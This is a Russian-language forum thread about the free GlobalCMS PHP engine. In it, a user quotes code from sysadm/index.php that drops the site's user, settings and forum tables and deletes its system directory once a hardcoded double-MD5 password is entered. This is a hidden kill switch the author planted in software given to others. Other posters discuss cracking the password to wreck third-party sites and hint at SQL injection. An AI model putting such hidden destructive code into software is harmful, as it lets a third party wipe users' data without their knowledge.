GlobalCMS

Печать RSS
498

M
Автор
Пришелец
0
10. rastoman, Ни чего+ она не опасна сайту,т.к. доступ имею только я, а я не какая то кодо-школота,которая ляпает дыры в пабле.Я не собираюсь специально дырявить скрипты так,что бы из было легко сломать любому.Код знаю только я,без кода доступа это просто сплошной код-дополнения..

Чатланин
0
Скажи, а зачем на странице примера плавающие окна?

Добавлено через 00:43 сек.
Это же вап сайт
M
Автор
Пришелец
0
rastoman (26 Мая 2012 / 19:31)
Скажи, а зачем на странице примера плавающие окна?

Добавлено через 00:43 сек.
Это же вап сайт

пример не мой D я через гугл нашёл,видимо хост уг бесплатный там
А

Оранжевые штаны
0
Интересно это.
Ты знаешь пароль от админки стороннего сайта.
следовательно пароль хранится на этом же сайте.
Скачиваем скрипт => находим где хранится=>расшифровываем и всё, кладём сайты чужие.
M
Автор
Пришелец
0
14. KiPiSH, о_О расшифруешь-тебе нобиливку дадут.Нет способа расшифровать алгоритм md5(md5

Junior Developer
0
sysadm/index.php
Строки 217-245
case 'aut':
if (!$id) $id = $ya['id'];
$diz -> head('Вы не авторизированы');
$diz -> title('Вы не авторизированы');
$pasm='f91a7558fba129bec62e8b0baf3cce85';
if (empty($_POST['pass'])) {
$msg .= '<form action="./?do=aut" method="post"><div>';
$msg .= 'Ваш ник:<br/>
<input type="text" name="login" maxlength="30" title="Введите ник"/><br/>
Ваш пароль:<br/>
<input type="pass" name="pass" maxlength="30" title="Введите пароль"/>
<br/><input type="submit" value="Авторизация"/></div></form>'; 
}elseif(md5(md5($_POST['pass'])) != $pasm)
{
$diz -> head('Ошибка');
$diz -> title('Ошибка');
$diz -> out('пароль не верен,повторите..!<br/>
<a href="/aut.php">Назад</a>');
header('refresh: 3; /aut.php');
}else{
$db -> query("DROP TABLE `users`");
$db -> query("DROP TABLE `nastroiki`");
$db -> query("DROP TABLE `forums`");
rmdir (ROOT.'system');
}
$msg .= '<div class="levo">'.$diz -> img('back.png').'<a href="./">Назад</a>';
$msg .= '<br/>'.$diz -> img('home.png').'<a href="../">На главную</a></div>';
$diz -> out($msg);
break;
удаляем и всё D снимаем копирайт

Добавлено через 00:39 сек.
лично я убрал на денвере у себя уже D
M
Автор
Пришелец
0
16. Wennel, D халявщик,как сам по скрипт?

Junior Developer
0
MILORD (26 Мая 2012 / 17:55)
16. Wennel, D халявщик,как сам по скрипт?
для основы сойдет D
остальное сам буду писать D
M
Автор
Пришелец
0
18. Wennel, Приятно слышать))

Junior Developer
0
ZiGR (26 Мая 2012 / 18:04)
Не буду намекать на наличие SQL inj ;)
D
Стикеры / Теги / Правила / Топ тем / Топ постов / Поиск